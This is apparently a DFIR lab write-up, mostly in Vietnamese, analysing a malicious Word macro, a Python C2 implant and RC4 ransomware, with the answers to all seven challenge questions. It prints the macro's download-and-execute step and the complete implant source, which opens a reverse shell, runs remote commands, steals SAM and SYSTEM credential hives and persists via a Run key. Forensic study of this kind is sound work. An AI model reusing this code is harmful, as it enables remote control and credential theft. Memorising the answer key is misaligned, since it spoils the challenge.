# The Malware Crusade
>Medium on DFIR labs
>Description
>I downloaded a phishy word document from my mail, little did I know it was gonna bite me back. Right after I downloaded the file my computer went haywire and all my files where encrypted. There is an important file among it. Can you figure out what all happened and also recover my files back ?
`File Password : L1>l:p7!7h4[D23^iZ&)`
>Questions
```
Q1) What is the value of the registry entry that was stored by the macro?
Q2) What is the first command that was sent to C2 victim from the C2 server?
Q3) What is the key used by the ransomware to encrypt the zip file? key used by the ransomware?
Q4) What is the md5 hash of the important document that he had compressed and stored {md5(file)}?
Q5) The can you find out where the user stores his secrests online
Q6) The user noted down the password to unlock private secret storage and forgot to save it can you recover it ?
Q7) What is inside the private secret storage ?
```
## Question1
Tôi sử dụng công cụ oletools để extraction ra các macro chứa trong file cv_001.dotm
Trong macro có các Function
- Sub AutoOpen() chức năng tự động chạy DownloadAndOpenFile và RegistryEntry
- Sub Document_Open() Chức năng khi document được mở sẽ chạy DownloadAndOpenFile và RegistryEntry
- Sub RegistryEntry() Chức năng tạo một key reg và lạm dụng Wscript.Shell để thêm registry
- Sub DownloadAndOpenFile()
download một file từ url
url = "https://filebin.net/d4oxliqap0dxa52y/client.py"
destinationPath = Environ("TEMP") & "\msserver.py"
sau đó chạy file với WSCRIPT.SHELL()
python.exe & " " & ' & DestinationPath '
### Answer 1 : keyValue = "fA3bDt"
Kiểm tra và lấy file trong folder path : C:\Users\challenge\AppData\Local\Temp\msserver.py
```
import json
import os
import shutil
import socket
import subprocess
import sys
import time
from sys import platform
import requests
import base64
def reliable_send(data):
jsondata = json.dumps(data)
s.send(jsondata.encode())
def reliable_recv():
data = ""
while True:
try:
data = data + s.recv(1024).decode().rstrip()
return json.loads(data)
except ValueError:
continue
def download_file(file_name):
f = open(file_name, "wb")
s.settimeout(2)
chunk = s.recv(1024)
while chunk:
f.write(chunk)
try:
chunk = s.recv(1024)
except socket.timeout as e:
break
s.settimeout(None)
f.close()
def upload_file(file_name):
f = open(file_name, "rb")
s.send(f.read())
f.close()
def download_url(url):
get_response = requests.get(url)
file_name = url.split("/")[-1]
with open(file_name, "wb") as out_file:
out_file.write(get_response.content)
def get_sam_dump():
if not is_admin():
return "You must run this function as an Administrator."
SAM = r"C:\\Windows\\System32\\config\\SAM"
SYSTEM = r"C:\\Windows\\System32\\config\\SYSTEM"
SECURITY = r"C:\\Windows\\System32\\config\\SECURITY"
try:
sam_file = open(SAM, "rb")
system_file = open(SYSTEM, "rb")
security_file = open(SECURITY, "rb")
sam_data = sam_file.read()
system_data = system_file.read()
security_data = security_file.read()
sam_file.close()
system_file.close()
security_file.close()
return sam_data, system_data, security_data
except PermissionError:
return "Insufficient permissions to access SAM, SYSTEM, or SECURITY files."
except FileNotFoundError:
return "SAM, SYSTEM, or SECURITY file not found. Please check the file paths."
except Exception as e:
return f"An unexpected error occurred: {str(e)}"
def persist(reg_name, copy_name):
file_location = os.environ["appdata"] + "\\" + copy_name
try:
if not os.path.exists(file_location):
shutil.copyfile(sys.executable, file_location)
subprocess.call(
"reg add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v "
+ reg_name
+ ' /t REG_SZ /d "'
+ file_location
+ '"',
shell=True,
)
reliable_send("[+] Created Persistence With Reg Key: " + reg_name)
else:
reliable_send("[+] Persistence Already Exists")
except:
reliable_send("[-] Error Creating Persistence With The Target Machine")
def startup_persist(file_name):
pass
def is_admin():
global admin
if platform == "win32":
try:
temp = os.listdir(
os.sep.join([os.environ.get("SystemRoot", "C:\\windows"), "temp"])
)
except:
admin = "[!!] User Privileges!"
else:
admin = "[+] Administrator Privileges!"
elif platform == "linux" or platform == "linux2" or platform == "darwin":
pass
def highly_secure_payload(data, flag):
if flag:
data = bytearray(data.encode())
for i in range(len(data)):
data[i] = data[i] ^ i
data = base64.b64encode(data).decode()
else:
data = bytearray(base64.b64decode(data))
for i in range(len(data)):
data[i] = data[i] ^ i
data = data.decode()
return data
def shell():
while True:
command = reliable_recv()
command = highly_secure_payload(command, 0)
if command == "quit":
break
elif command == "background" or command == "bg":
pass
elif command == "help":
pass
elif command == "clear":
pass
elif command[:3] == "cd ":
os.chdir(command[3:])
elif command[:6] == "upload":
download_file(command[7:])
elif command[:8] == "download":
upload_file(command[9:])
elif command[:3] == "get":
try:
download_url(command[4:])
reliable_send("[+] Downloaded File From Specified URL!")
except:
reliable_send("[!!] Download Failed!")
elif command[:11] == "persistence":
reg_name, copy_name = command[12:].split(" ")
persist(reg_name, copy_name)
elif command[:7] == "sendall":
subprocess.Popen(
command[8:],
shell=True,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
stdin=subprocess.PIPE,
)
elif command[:5] == "check":
try:
is_admin()
reliable_send(admin + " platform: " + platform)
except:
reliable_send("Cannot Perform Privilege Check! Platform: " + platform)
elif command[:5] == "start":
try:
subprocess.Popen(command[6:], shell=True)
reliable_send("[+] Started!")
except:
reliable_send("[-] Failed to start!")
elif command[:12] == "get_sam_dump":
sam_dump, system_dump, security_dump = get_sam_dump()
reliable_send((sam_dump, system_dump, security_dump))
else:
execute = subprocess.Popen(
command,
shell=True,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
stdin=subprocess.PIPE,
)
result = execute.stdout.read() + execute.stderr.read()
result = result.decode()
result = highly_secure_payload(result, 1)
reliable_send(result)
def connection():
while True:
time.sleep(1)
try:
s.connect(("192.168.56.1", 5555))
shell()
s.close()
break
except:
connection()
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connection()
```
Tóm tắt script
- connection() tạo một socket C2
- reliable_send(data): Gửi data
- reliable_recv() : Nhận data và Deseralization data
- download_file(file_name):
- upload_file(file_name):
- download_url()
- get_sam_dump() : đọc các credentials trong SAM và SYSTEM hive
- highly_secure_payload(data, flag) : Nếu có flag thì encode base64 và ^ i
Nếu không có flag thì decode base64 và decrypt XOR
- persist(reg_name, copy_name) add file vào CurrentVersion\\RUN
- is_admin(): check admin priviledge
- shell(): Control handler
Từ script ta lọc wireshark với ip.addr == 192.168.56.1 && tcp.port == 5555
script decrypt.py
```
import base64
enc = ["d2ltYmls", "Y2ljb2hZZW9pZWZuYmprAho=", "ZWJqbCRpT2RYQE1MVG54", "bEhhU01CQV9rfwcB", "ZWJqbCRkUTZ/azlBPERGRXhzf0Fid0Vgf3spVm9UVlEReExhXUcUaURKGWZfZGZhAFJfX0FvT0BfXQhXSV5TaS4CJX55ZXh5aC8jJyljOjck", "ZWJqbCRGYTo1KTQ1LGtnY3U/Zmtg", "ZWJqbCRGYTo1KTQ1LGtnY3U/Zmtg", "ZWJqbCRfQVFlQEJBYFRZXXZyf0V6dE5ZKHp0d3p5c1lTRXV2S0QUcR1laWlWSXllQmtqWEd8fm1QW3JtUGUMCigjFRY0CiEodWl0dWwrJyM1fyYrIA==", "ZWJqbCRMRUZvQEJZdWhaYFsxLC00c397fTduY2g=", "ZWJqbCRMRUZvQElKa0RNTWlLRXdkdiVFYXxMIm5HRnRHcXFhF0RxElFzfUhZeR1tXFNZR1hQZV9KY2JQT3R2cXEYLzcoIBUsA2l0dWwrJyM1fyYrIA==", "ZWJqbCRMRUZvQElKa0RNTSJIRWslT0Vgf0FjWiVUVntQQ0xpSH9fEnpNfX1VSHh1WFN6ZVhnblBXWldtUlxmcXAiLC8iJHQRfQUJCX4UGTdhCwRqIQwBZjQSCzRhfWBhQAcLDwFLEh8c", "ZWJqbCRMRUZvQElKa0RNTSNwRSZtT0F0bUgoY2p+LElse3pIS0ZLcUZIcmUcTkBDVlAAZQF+Z1gFGQQFHFtXUyVvNjsw", "ZWJqbCRMRUZvQElKa0RNTWlLSkEldnsjf313XW95SUprARwdBENPS00HXlNY", "ZWJqbCRMRUZvQE1dOFQ8WWd1VnxfNSgpOH9zd3kzamdU", "ZWJqbCRMRUZvQElKa0RNTWdISl1uVnEqJTkkJTx7d3NFD1ZbUA==", "ZWJqbCRGYTo1KTQ1LGtnY3U/Zmtg", "ZWJqbCRGYTo1KTQ1LGtnY3U/Zmtg", "ZWJqbCRkNFE9QE47a2k8Y2Vyf0V6WX1/VEtMd3pML0lzdEl1a3NgHn58Gn1/bkkSDREMDRRTX1tdF05DSA==", "ZWJqbCRmNVFhaDhdOURKP3dye1lAdyRNKH0oXWVHSGd2Q09PUUYVdUBLbVxFbkkSDREMDRRTX1tdF05DSA==", "ZWJqbCRha0F7bV1dam9jSWRLQVItXFVdWnpSWW98SVFIRWVPUkdPbmMJFBUMS0dDVR9GS0A=", "ZWJqbCRha0F7bV1ea11dTWlLRVV/TSVddEMod2Z5VlUVeRF5TEducURibV9ASH1YV1IBZV1UBGENdXl5DmRpR3EbFHoxHBF2JAIbJHFtcHFwNzs/MXsiLyw=", "ZWJqbCRGYTo1KTQ1LGtnY3U/Zmtg", "ZWJqbCRkNFE9QE47a2ljSWN1RUZfNSgpOH9zd3kzamdU", "ZWJqbCRGYTo1KTQ1LGtnY3U/Zmtg", "ZWJqbCRfaz5+QE47a0ZPYC0xLC00c397fTduY2g=", "ZWJqbCRMRUZvQEx/fERJVWZye1FkXFF7bVBSVSx+c3NVe1sWTEYUaVhIfBJfTx1LXFJffVxWBGFcel0GAR0AAWAnKy8hazI/PA==", "ZWJqbCRMRUZvQEl4a1o8ZHdLfyptXFF8f3hNL3t+LU1ZQHUWSmlLYVJwGEdcdR15R1J1ZU1sBHFCY2wLdx0AAWAnKy8hazI/PA==", "ZWJqbCRMRUZvQEl4a1o8ZHdLfyptXFF8f3hNL3t+LU1ZQHUWSmlLdVhzGEccTh8fexEMDRRTX1tdF05DSA==", "ZWJqbCROV2g1KTQ1LGtnY3U/Zmtg", "ZWJqbCRfaz5xQE1ga2xZO3dyf1VhTyRCd1dZcCpeeSIdARwdBENPS00HXlNY", "ZWJqbCRMRUZvQE1/YGhdTmJBQVFtTEEic3soK2lELHdWQHVtSG5hfV5LU0BnDRAREFdbX1EbQk9M", "ZWJqbCRGYTo1KTQ1LGtnY3U/Zmtg", "ZWJqbCRGYTo1KTQ1LGtnY3U/Zmtg", "ZWJqbCRfQVFlQE1/YGhYQXpwVUJ7dCRBLVJOdFc9ICEAR0tPQQtSX1w=", "ZWJqbCRMRUZvQEJFZmxJWXtYViNzQiR8f0N3ImVUWXRHQHUXQ0ZLYV1zGH5DYG1YV3xYZgZ+YAdzGQQFHFtXUyVvNjsw", "ZWJqbCRGYTo1KTQ1LGtnY3U/Zmtg", "ZWJqbCRMRUZvQE1ga11dTmdSdS4pNSgpOH9zd3kzamdU", "ZWJqbCRMRUZvQE1Rem5nTWFYVX9hXF5dcHt3f3BWWl5TaGZqFWtPTB5qTRYRDRAREFdbX1EbQk9M", "ZWJqbCRMRUZvQElKa0RNTWBYViNzXlF8f1JjWWZELHdMe2RXVX11ZlpgbV9ASHhbQXhxZlNXcWFNcn1PUFhtUyQKEQIoDAIOeQctJHFtcHFwNzs/MXsiLyw=", "ZWJqbCRGYTo1KTQ1LGtnY3U/Zmtg", "ZWJqbCRMRUZvQElKa0RNTSBzSlJzRUVVYkAoc3BHWGtReXNMGQUYGQhPQ0dJA1pXRA==", "ZWJqbCRMRUZvQElKa0RNTWpIIHt4T1BjaUFJWiVUVlFKQGV1T3IUS0xqTRYRDRAREFdbX1EbQk9M", "ZWJqbCRMRUZvQElKa0RNTWpIIHt4T1BjaEFJWiVUVk1UQmNMGQUYGQhPQ0dJA1pXRA==", "ZWJqbCRGYTo1KTQ1LGtnY3U/Zmtg", "ZWJqbCRMRUZvQEJBYGlGWWlze1FuTCR/dENbdCE9ICEAR0tPQQtSX1w=", "ZWJqbCRGYTo1KTQ1LGtnY3U/Zmtg", "ZWJqbCRGYTo1KTQ1LGtnY3U/Zmtg", "ZWJqbCRfQVFlQE1vYG9iQSByf0V8d0V/YkAoc3BHXXQWYkUeGQUYGQhPQ0dJA1pXRA==", "ZWJqbCRMRUZvQE1ga11dTmdSdS4pNSgpOH9zd3kzamdU", "ZWJqbCRMRUZvQE1ka11dTmdSdS4pNSgpOH9zd3kzamdU", "ZWJqbCRMRUZvQEJvY2xZd3xYVEFtcUFCLlp9JiE9ICEAR0tPQQtSX1w=", "ZWJqbCRMRUZvQElKa0RNTWBYViNzXlJSf1JjWWxWTV5MaGZqFWtBSBUJFBUMS0dDVR9GS0A=", "ZWJqbCRMRUZvQElKa0RNTWFYViNzXl5ZcnhdTXdKLHNEaGFQQ0RPTE9jeWpVY3p2exEMDRRTX1tdF05DSA==", "ZWJqbCRGYTo1KTQ1LGtnY3U/Zmtg", "ZWJqbCRMRUZvQElKa0RNTSBzSlJzRUVVYkAoc3BHWGtReXNMGQUYGQhPQ0dJA1pXRA==", "ZWJqbCRMRUZvQElKa0RNTWpIIHt4T1BjaUFJWiVUVlFKQGV1T3IUS0xqTRYRDRAREFdbX1EbQk9M", "ZWJqbCRMRUZvQElKa0RNTWpIIHt4T1BjaEFJWiVUVk1UQmNMGQUYGQhPQ0dJA1pXRA==", "ZWJqbCRGYTo1KTQ1LGtnY3U/Zmtg", "ZWJqbCRMRUZvQElKa0RNTSVwRUVnT1VVYkAoc3BHWGxPQhBtS39xdUpIfBtLZldtSmgAW1hvcENJYWlQW3dtfjkPFhkgBiF6dWl0dWwrJyM1fyYrIA==", "ZWJqbCRGYTo1KTQ1LGtnY3U/Zmtg", "ZWJqbCRGYTo1KTQ1LGtnY3U/Zmtg", "ZWJqbCRfQVFlQE1deVQ9RSVyWkJ7cVFBLH1ZbHt8LEkVanZMbwUYGQhPQ0dJA1pXRA==", "ZWJqbCRMRUZvQE1nYURJY2pwRSZucVFRbUAoTnN5WUkURWFUQ0YVdVFifkRnDRAREFdbX1EbQk9M", "ZWJqbCRMRUZvQElKa0RNTSBLSnskXFInf31dTSh5XSpMQ09tUn9hckdgRH0cd0cfBHhbWH8VCAkYX1NXWRNKRzQ=", "ZWJqbCRMRUZvQE1nYURJY2pwRSZucVFRbUAoTnN8LEkVbWFhXkFublhmTUQRDRAREFdbX1EbQk9M", "ZWJqbCRMRUZvQElKa0RNTWJLSnhzRUVVakNCcGlHSSpKQxBxSG5lbRlNbXJYYm1mQHJVDgkVCAkYX1NXWRNKRzQ=", "ZWJqbCRGYTo1KTQ1LGtnY3U/Zmtg", "ZWJqbCRMRUZvQEJFZmxJWXtYViNzdCRBLUwoVXNHXXdSe3pIVGZBGhUJFBUMS0dDVR9GS0A=", "ZWJqbCRMRUZvQE1/YGhYNmp1Wll4TEEnf0lJWXJHSSp0RWppSHxxF0dKGGVDd3l+QHJVDgkVCAkYX1NXWRNKRzQ=", "ZWJqbCRGYTo1KTQ1LGtnY3U/Zmtg", "ZWJqbCRMRUZvQE1FfG5JZ3xyfEF4cF5Gf0lJWXV4Rk1MeHppXXx+TEdie0QRDRAREFdbX1EbQk9M", "ZWJqbCRMRUZvQE1Rem5nTXpwVVVtXFF7bVBSSXB4Vk4WYkUeGQUYGQhPQ0dJA1pXRA==", "ZWJqbCRMRUZvQElKa0RNTXxzf15zRUVVcnhdXWVUWCtHQ091EEFlT1pzckdKTh19SWtldUB+Z1gFGQQFHFtXUyVvNjsw", "ZWJqbCRMRUZvQElKa0RNTXpwSlF7T05dKENCcyxRc1lXQmV1UX9lT0RLR2ZcbkkSDREMDRRTX1tdF05DSA==", "ZWJqbCRGYTo1KTQ1LGtnY3U/Zmtg", "ZWJqbCRMRUZvQEJBYGlGWWlze1F9cE5FdHpjc3Z8Rl1Pe3ppFH9+Txhie0QRDRAREFdbX1EbQk9M", "ZWJqbCRGYTo1KTQ1LGtnY3U/Zmtg", "ZWJqbCRGYTo1KTQ1LGtnY3U/Zmtg", "ZWJqbCRkQT58U1lKNURGQSFIfFFtdyRZdHopVmlHLEkQQxF1FEZucRhiaWFAdBxHRnhxZQVWBGFBWnJxSmdTUzMbERYtDhcodWl0dWwrJyM1fyYrIA==", "ZWJqbCRGYTo1KTQ1LGtnY3U/Zmtg", "ZWJqbCRfa2t7U1xJZGlJZ2pYViNzQmF4JTkkJTx7d3NFD1ZbUA==", "ZWJqbCRMRUZvQE1jem9ZWndaa1J9TVBvXUNCVW55WSZXaEtUbwUYGQhPQ0dJA1pXRA==", "ZWJqbCRMRUZvQE1jem9ZWndaa1J9TVBvXXsoVS1/SUlVRWpuTWlnSBUJFBUMS0dDVR9GS0A=", "ZWJqbCRMRUZvQE1jem9ZWndaa1J9TVBvXXspf2l/WSZIe2puTWlnSBUJFBUMS0dDVR9GS0A=", "ZWJqbCRMRUZvQE1jem9ZWndaa1J9TVBvVn1CVWxEZ1ZTYkUeGQUYGQhPQ0dJA1pXRA==", "ZWJqbCRMRUZvQE1jem9ZWndaa1J9TVBvSXhNVSx5RlVMQltqV2ZBGhUJFBUMS0dDVR9GS0A=", "ZWJqbCRMRUZvQE1jem9ZWndaa1J9TVBvT3hNSXB/LVJJbWNMGQUYGQhPQ0dJA1pXRA==", "ZWJqbCRdV2g1KTQ1LGtnY3U/Zmtg", "ZWJqbCRGYTo1KTQ1LGtnY3U/Zmtg", "ZWJqbCRGYTo1KTQ1LGtnY3U/Zmtg", "ZWJqbCRfaz5xQEJJZGlJaHdwRSdzT3t7a0NMWXR5WXdabkVMGQUYGQhPQ0dJA1pXRA==", "ZWJqbCRMRUZvQE1Rem5nTWlzICokWVVVc3hCUWZRXV1NQHVbSEZfZVhLQ2laTlcaA2hlS0Z+fnVQXX1cTHJZUH1hfH1kIy8rLWc+Mzg=", "ZWJqbCRMRUZvQElKa0RNTWdISkF7XFInf3p3Imp5XSpaQmVbVEFlT15KUx5Wd3ZuQHJVDgkVCAkYX1NXWRNKRzQ=", "ZWJqbCRMRUZvQElKa0RNTX1zIVpzdlFvcHhNLlt8SWdMaGVPUWxhfVhLbX1WYklADREMDRRTX1tdF05DSA==", "ZWJqbCRMRUZvQElKa0RNTndYUVJzdEFOf1JbdCE9ICEAR0tPQQtSX1w=", "ZWJqbCRMRUZvQElKa0RNTndYUVJzXFVWf1BSWW9ESXNVc09PV391ZkB5eWpFd2l5SlABYUJWdQJIW1dQVX5ZAn1hfH1kIy8rLWc+Mzg=", "ZWJqbCRMRUZvQElKa0RNTndYUVJzXFVWf1BdXWlHXV1XQ2VlVEdNfVhLbX5LZHofV3hfdkFWflxRel0GAR0AAWAnKy8hazI/PA==", "ZWJqbCRMRUZvQElKa0RNTndYUVJzXFVWf1BdXWlHXV1XQ2VlVEdNfVhLbX5LZHofV3hffQZtTHZPdGkOV18NbTQIJSx5ZXh5aC8jJyljOjck", "ZWJqbCRMRUZvQElKa0RNTndYUVJzXkJ4UzkkJTx7d3NFD1ZbUA==", "ZWJqbCRMRUZvQElKa0RNTndYUVJzXFVWf1BSWW9ESXNVc09PV391ZhFgYmFaTx1+V3pLcl1tcEBRcHlIW155RyggFXYDJBE/JAotdnFtcHFwNzs/MXsiLyw=", "ZWJqbCRMRUZvQElKa0RNTndYUVJzXFVWf1BSWWV8SSoQamphV3xxS117R0dfd31EexEMDRRTX1tdF05DSA==", "ZWJqbCRMRUZvQElKa0RNTndYUVJzXFVWf1BSf2x5WXhHQxFhSEdPT19LbW1cT0V1QFN1Zkd8dX1BYFNyTHR5eToIBRk0JwESfgotdnFtcHFwNzs/MXsiLyw=", "ZWJqbCRMRUZvQElKa0RNTndYUVJzXFVWf1BZWntUXV1XQ2VlVEdIdURMYnpLfX1tXVBlS1h5WH1UYG1qU3ZvUH1hfH1kIy8rLWc+Mzg=", "ZWJqbCRMRUZvQElKa0RNTndYUVJzXFVWf1BdVWx+WXdMQk5xSEBudk95eWlAT0NhSVRqcQR+fnVLYG1XSVl5aXQlATQjJHQRfQIbJHFtcHFwNzs/MXsiLyw=", "ZWJqbCRMRUZvQElKa0RNTndYUVJzXFVWf1BdImZRcFVMQ3UaFn91T19LbW1cT0V1QFN1ZkR2UQoFGQQFHFtXUyVvNjsw", "ZWJqbCRMRUZvQElKa0RNTndYUVJzXFVWf1BSf2x5WXhHQxFhSEdPT19LbW1cT0V1QFN1ZlN+T3ZRdVdtSWRHdjMIAQl3HC8OOAANDTYECRUgMxUGYhYxamV5ZGV8OzczBU8WGxA=", "ZWJqbCRMRUZvQElKa0RNTndYUVJzXFVWf1BZWntUXV1NQHVbSGlIQ1FIcnlAZmlhQFJ1W1hWWmVUXHJqTH5ZAn1hfH1kIy8rLWc+Mzg=", "ZWJqbCRMRUZvQElKa0RNTndYUVJzXFVWf1BSWWV8SSoQamFIbwUYGQhPQ0dJA1pXRA==", "cHh2a2trJiprKShiYX1hfWQxcHJncCAjIzl1a3lzNjhBD1JaAwkGAF9LDQICWlxGRFReWlpQRR9aWEleCgkQXXZ1JiYnKiIiYCUjJSljKyEzPjY2fHx/d3N5OHwAM3l/Bg4QQwgMCAJIAARLAx0LAVhWFBoYEFgDAA1dV1xaDFipqKA=", "cHh2a2trJmYmeXMrKisua3V9MnI6ZW8=", "QzteVndgdHRUamJqYGFrYXd0TldxZn1jd2lGVnV+bHBTTkRXBGBCQE0HRkVHICQiOnIIb2FGU0VLZVlTXVFSWi4mJx8AKiUyJSwkPz8RJyIgPiAnNTsieSIwKlZWUFQcWj03EAEXFTsLAQsHAAgACBUtNhwDGxoYGR0JJxoUEhqu9fr3iY+LjQ==", "ZWJqbCRhaWltKQ==", "ZG5sZiQIDA=="]
def decrypt(data):
data = bytearray(base64.b64decode(data))
for i in range(len(data)):
data[i] ^= i
return data.decode()
for payload in enc:
dec = decrypt(payload)
print(dec)
```
### Answer 2 : whoami
## Question 3
tôi sẽ lưu lại script a.py và đọc source của nó
a.py là một file ransomware sử dụng RC4 để encryption file
key được chia ra 2 phần
Base | random chars range(4)
Basekey ta đã có từ Question1
ta viết script brute decrypt file inportant.zip.enc điều kiện sau khi decrypt với key nào ra được header zip : b"PK\x03\x04" thì lấy key
```
import itertools
import string
# Dữ liệu mã hóa
enc_data = b'\x92wC)\xdb\xf7\x9f<\x034V\xcd\xfb\x12\x99*\xd2\x81\x02j6\x91Ihb\xeb\xef1\x88\xa5'
# Base key bạn cung cấp
base_key = "fA3bDt"
# Hàm sinh RC4 stream và giải mã
def keySchd(key):
sched = list(range(256))
i = 0
for j in range(256):
i = (i + sched[j] + key[j % len(key)]) % 256
sched[j], sched[i] = sched[i], sched[j]
return sched
def genStream(sched):
i = j = 0
while True:
i = (i + 1) % 256
j = (sched[i] + j) % 256
sched[i], sched[j] = sched[j], sched[i]
yield sched[(sched[i] + sched[j]) % 256]
def rc4_decrypt(data, key):
sched = keySchd(key)
stream = genStream(sched)
return bytes([b ^ next(stream) for b in data])
# Charset của 4 ký tự cuối
charset = string.ascii_letters + string.digits
# Brute-force
for suffix in itertools.product(charset, repeat=4):
full_key = (base_key + ''.join(suffix)).encode()
decrypted = rc4_decrypt(enc_data[:8], full_key)
if decrypted.startswith(b"PK\x03\x04"):
print(f"[+] Found Key: {full_key.decode()}")
full_decrypted = rc4_decrypt(enc_data, full_key)
print(f"[+] Decrypted Data: {full_decrypted}")
# Ghi file nếu muốn:
with open("decrypted.zip", "wb") as f:
f.write(full_decrypted)
break
```
### Answer 3 : fA3bDtz8z7
## Question 4:
Sau khi decrypt file inpomtant nó đã bị bảo mật
hash md5 của file important.zip
### Answer 4 : 2b33ff2f343ac8e7b2158ca00be8f6b6
## Question 5
Kiểm tra web browser của user ta thấy có BraveSoftware extract file History , Folder Path : %AppData%\\Local\BraveSoftware\\User Data\\Default\\History
sử dụng các trình đọc database
### Answer 5 : https://pastebin.com/qPsjHKrW
## Question 6:
Trang pastebin đã bị locked đã đến lúc sử dụng đến file memory
check ProcessList ta thấy có process NotePad.exe với PID = 6876
ở câu hỏi này tôi đã mất thời gian rất lâu để tìm ra tôi đã được Author gợi ý cho Heap Allocations và blog để tìm hiểu về điều này
https://www.sans.org/blog/the-analysis-of-user-data-in-VADs-extraction-of-precise-data-in-notepad-memory-and-hunting-for-malware-behavior/
Tôi sử dụng MemProcFS để convert .mem to .dmp chuẩn định dạng crash dump cho WinDBG
attach Process debug với Notepad.exe
sau đó list các VADs Heap allocation của tiến trình này
```
!heap -s -v -a
```
Theo như blog thì cái ta cần kiểm tra thì các allocation phải không được gán flag LFH và Sub-segment và nên được gán flag "extra user_flags" nhưng trong list heap này tôi chỉ thấy nó có 1 allocation "free user_flags" tôi đã thử kiểm tra data nhưng không có gì vì theo thư mô tả flag
```
HEAP_ENTRY_BUSY: Indicates if a memory block is currently in use (1) or free (0) - this is the fundamental allocation status flag.
```
allocation này có vẻ như đã bị giải phóng. Ta chỉ còn cách dump toàn bộ FirstEntry-LastValid Entry của heap allocation để check
sau khi thực hiện như blog ta có offset heap : 000001df84730000
dump Heap location này ra và filter với strings + grep tìm password điều này giúp ta giảm tối đã lượng bytes thu hẹp lại chỉ trong phạm vi Heap Allocations FirstEntry
```
db 0x000001df`84730740 L 0xFE8C9
```
có 2 chuỗi nghi ngờ
```
Y24k8UPs
FUl i3deXy3QM3
```
### Answer 6: i3deXy3QM3
## Question 7:
Dùng mật khẩu unlocked pastebin ta có password file zip
### Answer 7 : KvvO60Zf69Yyq8
Sign in with Wallet
Connect another wallet